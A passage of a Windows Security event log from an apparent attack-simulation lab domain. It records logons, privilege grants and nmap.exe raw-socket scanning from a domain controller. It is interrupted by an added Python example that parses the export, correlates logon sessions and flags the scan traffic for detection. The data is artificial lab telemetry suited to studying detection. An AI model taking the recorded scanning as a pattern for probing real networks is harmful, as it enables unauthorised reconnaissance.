Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 127.0.0.1
Source Port: 1282
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887303
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8FB87C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887302
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.16.8.5
Source Port: 0
Destination Address: 114.22.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887301
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 1282
Destination Address: 127.0.0.1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887300
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Direction: Outbound
Source Address: 127.0.0.1
Source Port: 1282
Destination Address: 127.0.0.1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887299
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1282
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887298
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 128.194.32.0
Source Port: 0
Destination Address: 180.10.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887297
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 1281
Destination Address: ::1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887296
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Source Address: ::
Source Port: 1281
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:28:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887306
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x18c8
Process Name: C:\Windows\System32\taskhostw.exe
Exit Status: 0x0
04/19/2021 06:28:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278970
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3716
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\bin\splunkd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53929
Destination Address: 10.0.1.12
Destination Port: 8089
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278969
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53928
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887308
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1283
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887307
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1283
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887309
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x458
Process Name: C:\Windows\System32\dllhost.exe
Exit Status: 0x0
04/19/2021 06:28:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278971
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xbf4
Process Name: C:\Windows\System32\taskhostw.exe
Exit Status: 0x0
04/19/2021 06:28:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887311
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 174.27.138.219
Source Port: 60806
Destination Address: 10.0.1.14
Destination Port: 3389
Protocol: 6
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887310
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 174.27.138.219
Source Port: 60806
Destination Address: 10.0.1.14
Destination Port: 3389
Protocol: 6
Filter Information:
Filter Run-Time ID: 66849
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278972
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53930
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887314
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 6816
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 58259
Destination Address: 127.0.0.1
Destination Port: 58258
Protocol: 6
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887313
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1284
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887312
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1284
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278973
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x142c
Process Name: C:\Windows\System32\dllhost.exe
Exit Status: 0x0
04/19/2021 06:28:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278974
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53931
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887316
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1285
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887315
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1285
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887330
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8FC071
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
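The 4624 and 4634 descriptions above state that a logoff is correlated with its logon through the Logon ID, that the ID is unique only between reboots of one computer, and that the Subject and New Logon sections each carry their own Security ID and Logon ID. The following Python is an added example, not part of this export and not Splunk or Microsoft tooling: it parses this multi-line export format, joins 4624, 4672 and 4634 on (ComputerName, Logon ID), and, with the same parser, lists the 5156 connect events that carry Protocol 255 and source port 0 from a binary outside \windows, which is how every nmap.exe entry on this page appears. The sample input is constructed by copying four of this page's events and trimming them to the fields used; the function and variable names are my own.

```python
"""Parse a Splunk-style Windows Security export and correlate events by Logon ID.
Added example, not part of the exported log. Assumes the layout seen in this export:
timestamp line, Key=Value header lines up to Message=, then 'Section:' and 'Key: Value'
body lines, optionally followed by free-text description paragraphs."""
import re
from collections import defaultdict

TIMESTAMP = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")
WINDOWS_DIR = "\\device\\harddiskvolume1\\windows\\"

# Constructed sample: four events copied from this export, trimmed to the fields used below.
SAMPLE = r"""04/19/2021 06:28:31 PM
EventCode=4624
ComputerName=win-dc-982.attackrange.local
Message=An account was successfully logged on.
Subject:
Logon ID: 0x0
New Logon:
Account Name: WIN-DC-982$
Logon ID: 0x8FC071
This event is generated when a logon session is created.
04/19/2021 06:28:31 PM
EventCode=4672
ComputerName=win-dc-982.attackrange.local
Message=Special privileges assigned to new logon.
Subject:
Logon ID: 0x8FC071
Privileges: SeSecurityPrivilege
SeDebugPrivilege
04/19/2021 06:28:31 PM
EventCode=5156
ComputerName=win-dc-982.attackrange.local
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Source Address: 80.16.8.5
Source Port: 0
Destination Address: 22.79.0.0
Protocol: 255
04/19/2021 06:28:31 PM
EventCode=4634
ComputerName=win-dc-982.attackrange.local
Message=An account was logged off.
Subject:
Logon ID: 0x8FC071
"""

def parse_events(text):
    """Split the export into dicts; body keys get a 'Section.' prefix (Logon ID recurs per section)."""
    events, ev, section, last, body = [], None, None, None, False
    for line in text.splitlines():
        if TIMESTAMP.match(line):
            ev, section, last, body = {"Timestamp": line}, None, None, False
            events.append(ev)
        elif ev is None or not line:
            continue
        elif not body:                              # Key=Value header; Message= ends it
            key, _, value = line.partition("=")
            ev[key], body = value, key == "Message"
        elif line.endswith(":") and ": " not in line:
            section = line[:-1]
        elif ": " in line:
            key, _, value = line.partition(": ")
            last = f"{section}.{key}" if section else key
            ev[last] = value
        elif " " not in line and last:              # privilege list continuation lines;
            ev[last] += " " + line                  # description prose has spaces and is skipped
    return events

def reconstruct_sessions(events):
    """Join 4624, 4672 and 4634 on (host, Logon ID); Logon IDs are unique only between reboots of one host."""
    sessions = defaultdict(dict)
    for e in events:
        code, host = e["EventCode"], e["ComputerName"]
        if code == "4624":
            sessions[host, e["New Logon.Logon ID"]].update(
                account=e["New Logon.Account Name"], logon_time=e["Timestamp"])
        elif code == "4672":
            sessions[host, e["Subject.Logon ID"]]["privileges"] = e["Subject.Privileges"].split()
        elif code == "4634":
            sessions[host, e["Subject.Logon ID"]]["logoff_time"] = e["Timestamp"]
    return dict(sessions)

def flag_raw_connects(events):
    """5156 connects with Protocol 255 (the IPPROTO_RAW value) and port 0 from outside \\windows\\, as nmap.exe shows here."""
    net, hits = "Network Information.", []
    for e in events:
        app = e.get("Application Information.Application Name", "").lower()
        if (e["EventCode"] == "5156" and e[net + "Protocol"] == "255"
                and e[net + "Source Port"] == "0" and not app.startswith(WINDOWS_DIR)):
            hits.append((e["ComputerName"], app.rsplit("\\", 1)[-1],
                         e[net + "Source Address"], e[net + "Destination Address"]))
    return hits

if __name__ == "__main__":
    evs = parse_events(SAMPLE)
    print(reconstruct_sessions(evs), flag_raw_connects(evs), sep="\n")
```

Run as a script it prints the reconstructed session 0x8FC071 (logon, privileges, logoff) and the single nmap.exe raw-socket connect. On the full export, note that within one timestamp the records are written in descending RecordNumber order, so a 4634 can precede its own 4624 in text order; the join by Logon ID does not depend on that order.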
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887329
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.152.8.2
Source Port: 0
Destination Address: 77.176.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887328
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.152.8.3
Source Port: 0
Destination Address: 128.251.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887327
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.24.8.4
Source Port: 0
Destination Address: 100.249.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887326
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8FC071
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 127.0.0.1
Source Port: 1287
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887325
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8FC071
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887324
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.16.8.5
Source Port: 0
Destination Address: 22.79.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887323
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 1287
Destination Address: 127.0.0.1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887322
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Direction: Outbound
Source Address: 127.0.0.1
Source Port: 1287
Destination Address: 127.0.0.1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887321
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1287
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887320
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 128.194.32.0
Source Port: 0
Destination Address: 3.24.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887319
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 1286
Destination Address: ::1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
